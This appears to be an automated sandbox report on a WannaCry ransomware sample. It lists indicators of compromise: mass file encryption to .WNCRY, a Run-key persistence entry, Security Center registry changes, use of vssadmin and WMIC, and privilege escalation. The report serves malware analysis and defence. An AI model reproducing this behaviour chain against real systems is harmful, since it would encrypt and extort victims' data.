ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa

Resubmissions

18-10-2019 15:52

191018-8typv9j9fn 0

09-08-2019 12:22

190809-4hmrwf3nzs 0

Analysis

max time kernel
149s
max time network
152s
resource
win10v191014

Sharing

Copy URL

Twitter E-mail

General

Target

ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
Sample

191018-8typv9j9fn
SHA256

ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa

Score

N/A

Malware Config

Signatures

Suspicious use of SetWindowsHookEx 6 IoCs

Processes:

@[email protected]@[email protected]@[email protected]@[email protected]@[email protected]@[email protected]

pid process

2976 @[email protected]
4372 @[email protected]
4284 @[email protected]
1508 @[email protected]
5088 @[email protected]
4540 @[email protected]
Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

taskhsvc.exe

pid process

4896 taskhsvc.exe

pid	process
2976	@[email protected]
4372	@[email protected]
4284	@[email protected]
1508	@[email protected]
5088	@[email protected]
4540	@[email protected]

pid	process
4896	taskhsvc.exe

Modifies service 2 TTPs 1 IoCs

persistence

Modify Registry

T1112

Processes:

svchost.exe

description	ioc	pid	process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\BITS\Performance\PerfMMFileName = "Global\\MMF_BITSe2fc4e5f-a4d7-4133-9ba7-afbb316e23e2"	1984	svchost.exe

Drops file in system dir 5 IoCs

Processes:

svchost.exe

description	ioc	pid	process
File opened for modification	C:\Windows\Debug\ESE.TXT	1984	svchost.exe
File opened for modification	C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp	1984	svchost.exe
File created	C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp	1984	svchost.exe
File opened for modification	C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-2.tmp	1984	svchost.exe
File created	C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-2.tmp	1984	svchost.exe

Executes dropped EXE 16 IoCs

Processes:

taskdl.exe@[email protected]@[email protected]taskse.exe@[email protected]taskdl.exetaskhsvc.exetaskdl.exetaskse.exe@[email protected]taskdl.exetaskse.exe@[email protected]taskse.exe@[email protected]taskdl.exe

pid	process
1536	taskdl.exe
4372	@[email protected]
2976	@[email protected]
4300	taskse.exe
4284	@[email protected]
4128	taskdl.exe
4896	taskhsvc.exe
1340	taskdl.exe
1468	taskse.exe
1508	@[email protected]
5028	taskdl.exe
5068	taskse.exe
5088	@[email protected]
3724	taskse.exe
4540	@[email protected]
4328	taskdl.exe

Wannacry file encrypt 64 IoCs

Processes:

ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe

description	ioc	pid	process
File renamed	C:\Users\Admin\Desktop\WaitRevoke.txt.WNCRYT => C:\Users\Admin\Desktop\WaitRevoke.txt.WNCRY	4956	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File opened for modification	C:\Users\Admin\Desktop\WaitRevoke.txt.WNCRY	4956	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File renamed	C:\Users\Admin\Desktop\WritePop.pptx.WNCRYT => C:\Users\Admin\Desktop\WritePop.pptx.WNCRY	4956	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File opened for modification	C:\Users\Admin\Desktop\WritePop.pptx.WNCRY	4956	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File renamed	C:\Users\Admin\Desktop\CloseAdd.3gp.WNCRYT => C:\Users\Admin\Desktop\CloseAdd.3gp.WNCRY	4956	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File opened for modification	C:\Users\Admin\Desktop\CloseAdd.3gp.WNCRY	4956	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File renamed	C:\Users\Admin\Desktop\DismountHide.php.WNCRYT => C:\Users\Admin\Desktop\DismountHide.php.WNCRY	4956	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File opened for modification	C:\Users\Admin\Desktop\DismountHide.php.WNCRY	4956	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File renamed	C:\Users\Admin\Desktop\JoinPush.wmv.WNCRYT => C:\Users\Admin\Desktop\JoinPush.wmv.WNCRY	4956	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File opened for modification	C:\Users\Admin\Desktop\JoinPush.wmv.WNCRY	4956	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File renamed	C:\Users\Admin\Desktop\OpenSplit.xltx.WNCRYT => C:\Users\Admin\Desktop\OpenSplit.xltx.WNCRY	4956	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File opened for modification	C:\Users\Admin\Desktop\OpenSplit.xltx.WNCRY	4956	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File renamed	C:\Users\Admin\Desktop\SkipUnlock.xltx.WNCRYT => C:\Users\Admin\Desktop\SkipUnlock.xltx.WNCRY	4956	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File opened for modification	C:\Users\Admin\Desktop\SkipUnlock.xltx.WNCRY	4956	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File renamed	C:\Users\Admin\Desktop\StartLock.zip.WNCRYT => C:\Users\Admin\Desktop\StartLock.zip.WNCRY	4956	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File opened for modification	C:\Users\Admin\Desktop\StartLock.zip.WNCRY	4956	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File renamed	C:\Users\Admin\Desktop\StopBlock.bat.WNCRYT => C:\Users\Admin\Desktop\StopBlock.bat.WNCRY	4956	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File opened for modification	C:\Users\Admin\Desktop\StopBlock.bat.WNCRY	4956	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File renamed	C:\Users\Admin\Desktop\SuspendAssert.xlsm.WNCRYT => C:\Users\Admin\Desktop\SuspendAssert.xlsm.WNCRY	4956	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File opened for modification	C:\Users\Admin\Desktop\SuspendAssert.xlsm.WNCRY	4956	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File renamed	C:\Users\Admin\Documents\Are.docx.WNCRYT => C:\Users\Admin\Documents\Are.docx.WNCRY	4956	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File opened for modification	C:\Users\Admin\Documents\Are.docx.WNCRY	4956	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File renamed	C:\Users\Admin\Documents\Files.docx.WNCRYT => C:\Users\Admin\Documents\Files.docx.WNCRY	4956	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File opened for modification	C:\Users\Admin\Documents\Files.docx.WNCRY	4956	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File renamed	C:\Users\Admin\Documents\MergeStep.vsdx.WNCRYT => C:\Users\Admin\Documents\MergeStep.vsdx.WNCRY	4956	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File opened for modification	C:\Users\Admin\Documents\MergeStep.vsdx.WNCRY	4956	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File renamed	C:\Users\Admin\Documents\Opened.docx.WNCRYT => C:\Users\Admin\Documents\Opened.docx.WNCRY	4956	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File opened for modification	C:\Users\Admin\Documents\Opened.docx.WNCRY	4956	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File renamed	C:\Users\Admin\Documents\OptimizeGroup.txt.WNCRYT => C:\Users\Admin\Documents\OptimizeGroup.txt.WNCRY	4956	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File opened for modification	C:\Users\Admin\Documents\OptimizeGroup.txt.WNCRY	4956	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File renamed	C:\Users\Admin\Documents\Recently.docx.WNCRYT => C:\Users\Admin\Documents\Recently.docx.WNCRY	4956	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File opened for modification	C:\Users\Admin\Documents\Recently.docx.WNCRY	4956	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File renamed	C:\Users\Admin\Documents\SubmitDebug.ppt.WNCRYT => C:\Users\Admin\Documents\SubmitDebug.ppt.WNCRY	4956	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File opened for modification	C:\Users\Admin\Documents\SubmitDebug.ppt.WNCRY	4956	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File renamed	C:\Users\Admin\Documents\These.docx.WNCRYT => C:\Users\Admin\Documents\These.docx.WNCRY	4956	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File opened for modification	C:\Users\Admin\Documents\These.docx.WNCRY	4956	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File renamed	C:\Users\Admin\Documents\UnblockExport.csv.WNCRYT => C:\Users\Admin\Documents\UnblockExport.csv.WNCRY	4956	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File opened for modification	C:\Users\Admin\Documents\UnblockExport.csv.WNCRY	4956	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File renamed	C:\Users\Admin\Documents\WriteDismount.xlsx.WNCRYT => C:\Users\Admin\Documents\WriteDismount.xlsx.WNCRY	4956	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File opened for modification	C:\Users\Admin\Documents\WriteDismount.xlsx.WNCRY	4956	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File renamed	C:\Users\Admin\Documents\AddDismount.pptm.WNCRYT => C:\Users\Admin\Documents\AddDismount.pptm.WNCRY	4956	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File opened for modification	C:\Users\Admin\Documents\AddDismount.pptm.WNCRY	4956	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File renamed	C:\Users\Admin\Documents\ApproveMeasure.docm.WNCRYT => C:\Users\Admin\Documents\ApproveMeasure.docm.WNCRY	4956	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File opened for modification	C:\Users\Admin\Documents\ApproveMeasure.docm.WNCRY	4956	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File renamed	C:\Users\Admin\Documents\CloseLock.potx.WNCRYT => C:\Users\Admin\Documents\CloseLock.potx.WNCRY	4956	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File opened for modification	C:\Users\Admin\Documents\CloseLock.potx.WNCRY	4956	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File renamed	C:\Users\Admin\Documents\DisconnectCompare.xltm.WNCRYT => C:\Users\Admin\Documents\DisconnectCompare.xltm.WNCRY	4956	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File opened for modification	C:\Users\Admin\Documents\DisconnectCompare.xltm.WNCRY	4956	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File renamed	C:\Users\Admin\Documents\DismountUse.odp.WNCRYT => C:\Users\Admin\Documents\DismountUse.odp.WNCRY	4956	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File opened for modification	C:\Users\Admin\Documents\DismountUse.odp.WNCRY	4956	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File renamed	C:\Users\Admin\Documents\NewUnprotect.xltm.WNCRYT => C:\Users\Admin\Documents\NewUnprotect.xltm.WNCRY	4956	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File opened for modification	C:\Users\Admin\Documents\NewUnprotect.xltm.WNCRY	4956	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File renamed	C:\Users\Admin\Documents\OutConvert.docm.WNCRYT => C:\Users\Admin\Documents\OutConvert.docm.WNCRY	4956	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File opened for modification	C:\Users\Admin\Documents\OutConvert.docm.WNCRY	4956	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File renamed	C:\Users\Admin\Documents\ReceiveEnable.pot.WNCRYT => C:\Users\Admin\Documents\ReceiveEnable.pot.WNCRY	4956	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File opened for modification	C:\Users\Admin\Documents\ReceiveEnable.pot.WNCRY	4956	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File renamed	C:\Users\Admin\Documents\UnregisterRead.ods.WNCRYT => C:\Users\Admin\Documents\UnregisterRead.ods.WNCRY	4956	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File opened for modification	C:\Users\Admin\Documents\UnregisterRead.ods.WNCRY	4956	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File renamed	C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\brndlog.txt.WNCRYT => C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\brndlog.txt.WNCRY	4956	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\brndlog.txt.WNCRY	4956	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File renamed	C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{3fd336ea-c68e-47df-b2bf-24527681fe24}\0.0.filtertrie.intermediate.txt.WNCRYT => C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{3fd336ea-c68e-47df-b2bf-24527681fe24}\0.0.filtertrie.intermediate.txt.WNCRY	4956	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File opened for modification	C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{3fd336ea-c68e-47df-b2bf-24527681fe24}\0.0.filtertrie.intermediate.txt.WNCRY	4956	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File renamed	C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{4c7824f5-2f93-430b-a953-417ce8bc1d70}\0.0.filtertrie.intermediate.txt.WNCRYT => C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{4c7824f5-2f93-430b-a953-417ce8bc1d70}\0.0.filtertrie.intermediate.txt.WNCRY	4956	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File opened for modification	C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{4c7824f5-2f93-430b-a953-417ce8bc1d70}\0.0.filtertrie.intermediate.txt.WNCRY	4956	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe

Drops Office document 29 IoCs

dropper exploiter maldoc

Processes:

ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe

description	ioc	pid	process
File opened for modification	C:\Users\Admin\Desktop\WritePop.pptx	4956	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File opened for modification	C:\Users\Admin\Desktop\OpenSplit.xltx	4956	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File opened for modification	C:\Users\Admin\Desktop\SkipUnlock.xltx	4956	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File opened for modification	C:\Users\Admin\Desktop\SuspendAssert.xlsm	4956	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File opened for modification	C:\Users\Admin\Documents\Are.docx	4956	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File opened for modification	C:\Users\Admin\Documents\Files.docx	4956	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File opened for modification	C:\Users\Admin\Documents\Opened.docx	4956	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File opened for modification	C:\Users\Admin\Documents\Recently.docx	4956	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File opened for modification	C:\Users\Admin\Documents\SubmitDebug.ppt	4956	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File opened for modification	C:\Users\Admin\Documents\These.docx	4956	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File opened for modification	C:\Users\Admin\Documents\WriteDismount.xlsx	4956	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File opened for modification	C:\Users\Admin\Documents\AddDismount.pptm	4956	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File opened for modification	C:\Users\Admin\Documents\ApproveMeasure.docm	4956	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File opened for modification	C:\Users\Admin\Documents\CloseLock.potx	4956	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File opened for modification	C:\Users\Admin\Documents\DisconnectCompare.xltm	4956	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File opened for modification	C:\Users\Admin\Documents\NewUnprotect.xltm	4956	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File opened for modification	C:\Users\Admin\Documents\OutConvert.docm	4956	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File opened for modification	C:\Users\Admin\Documents\ReceiveEnable.pot	4956	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\ExpandPing.doc	4956	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File opened for modification	C:\Users\Admin\Downloads\SwitchLock.docx	4956	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File opened for modification	C:\Users\Admin\Downloads\TraceUninstall.xls	4956	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File opened for modification	C:\Users\Admin\Music\UninstallGet.docx	4956	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\CompleteInvoke.ppsm	4956	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\OpenTest.dotm	4956	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\StopPop.xltm	4956	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Document Building Blocks\1033\16\Built-In Building Blocks.dotx	4956	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm	4956	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File opened for modification	C:\Users\Admin\Downloads\TraceWatch.xlsb	4956	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File opened for modification	C:\Users\Admin\Music\RestartPublish.docm	4956	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe

Drops startup file 6 IoCs

Processes:

ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe

description	ioc	pid	process
File created (read-only)	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SDB4BC.tmp	4956	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SDB4BC.tmp	4956	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File deleted	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SDB4BC.tmp	4956	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File created (read-only)	C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\~SDB4E2.tmp	4956	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\~SDB4E2.tmp	4956	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File deleted	C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\~SDB4E2.tmp	4956	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe

Windows security modification 2 TTPs 2 IoCs

evasion trojan

Modify Registry

T1112

Processes:

svchost.exe

description	ioc	pid	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Security Center\cval = "0"	2812	svchost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Security Center\cval = "1"	2812	svchost.exe

Modifies file permissions 1 TTPs 1 IoCs

File and Directory Permissions Modification
T1222

Processes:

icacls.exe

pid process

4996 icacls.exe

pid	process
4996	icacls.exe

Sets desktop wallpaper using registry 2 TTPs 2 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe@[email protected]

description	ioc	pid	process
Set value (str)	\REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]"	4956	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]"	4284	@[email protected]

Adds Run entry to start application 2 TTPs 1 IoCs

persistence

Modify Registry

T1112

Processes:

reg.exe

description	ioc	pid	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\nmsqcsinudawe237 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\tasksche.exe\""	4184	reg.exe

wannacry family
family

Suspicious use of WriteProcessMemory 26 IoCs

Processes:

ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.execmd.execmd.execmd.exe@[email protected]@[email protected]cmd.exe

description	pid	process	target process
PID 4956 wrote to memory of 4972	4956	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	attrib.exe
PID 4956 wrote to memory of 4996	4956	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	icacls.exe
PID 4956 wrote to memory of 1536	4956	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	taskdl.exe
PID 4956 wrote to memory of 4260	4956	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	cmd.exe
PID 4260 wrote to memory of 2820	4260	cmd.exe	cscript.exe
PID 4956 wrote to memory of 4372	4956	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	@[email protected]
PID 4956 wrote to memory of 3752	4956	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	cmd.exe
PID 3752 wrote to memory of 2976	3752	cmd.exe	@[email protected]
PID 4956 wrote to memory of 4300	4956	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	taskse.exe
PID 4956 wrote to memory of 4284	4956	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	@[email protected]
PID 4956 wrote to memory of 4236	4956	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	cmd.exe
PID 4956 wrote to memory of 4128	4956	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	taskdl.exe
PID 4236 wrote to memory of 4184	4236	cmd.exe	reg.exe
PID 4372 wrote to memory of 4896	4372	@[email protected]	taskhsvc.exe
PID 2976 wrote to memory of 4292	2976	@[email protected]	cmd.exe
PID 4292 wrote to memory of 660	4292	cmd.exe	vssadmin.exe
PID 4292 wrote to memory of 496	4292	cmd.exe	WMIC.exe
PID 4956 wrote to memory of 1340	4956	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	taskdl.exe
PID 4956 wrote to memory of 1468	4956	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	taskse.exe
PID 4956 wrote to memory of 1508	4956	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	@[email protected]
PID 4956 wrote to memory of 5028	4956	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	taskdl.exe
PID 4956 wrote to memory of 5068	4956	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	taskse.exe
PID 4956 wrote to memory of 5088	4956	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	@[email protected]
PID 4956 wrote to memory of 3724	4956	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	taskse.exe
PID 4956 wrote to memory of 4540	4956	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	@[email protected]
PID 4956 wrote to memory of 4328	4956	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	taskdl.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

4184 reg.exe

pid	process
4184	reg.exe

Suspicious use of AdjustPrivilegeToken 28 IoCs

Processes:

taskse.exevssvc.exeWMIC.exetaskse.exetaskse.exetaskse.exe

description	pid	process
Token: SeTcbPrivilege	4300	taskse.exe
Token: SeBackupPrivilege	840	vssvc.exe
Token: SeRestorePrivilege	840	vssvc.exe
Token: SeAuditPrivilege	840	vssvc.exe
Token: SeIncreaseQuotaPrivilege	496	WMIC.exe
Token: SeSecurityPrivilege	496	WMIC.exe
Token: SeTakeOwnershipPrivilege	496	WMIC.exe
Token: SeLoadDriverPrivilege	496	WMIC.exe
Token: SeSystemProfilePrivilege	496	WMIC.exe
Token: SeSystemtimePrivilege	496	WMIC.exe
Token: SeProfSingleProcessPrivilege	496	WMIC.exe
Token: SeIncBasePriorityPrivilege	496	WMIC.exe
Token: SeCreatePagefilePrivilege	496	WMIC.exe
Token: SeBackupPrivilege	496	WMIC.exe
Token: SeRestorePrivilege	496	WMIC.exe
Token: SeShutdownPrivilege	496	WMIC.exe
Token: SeDebugPrivilege	496	WMIC.exe
Token: SeSystemEnvironmentPrivilege	496	WMIC.exe
Token: SeRemoteShutdownPrivilege	496	WMIC.exe
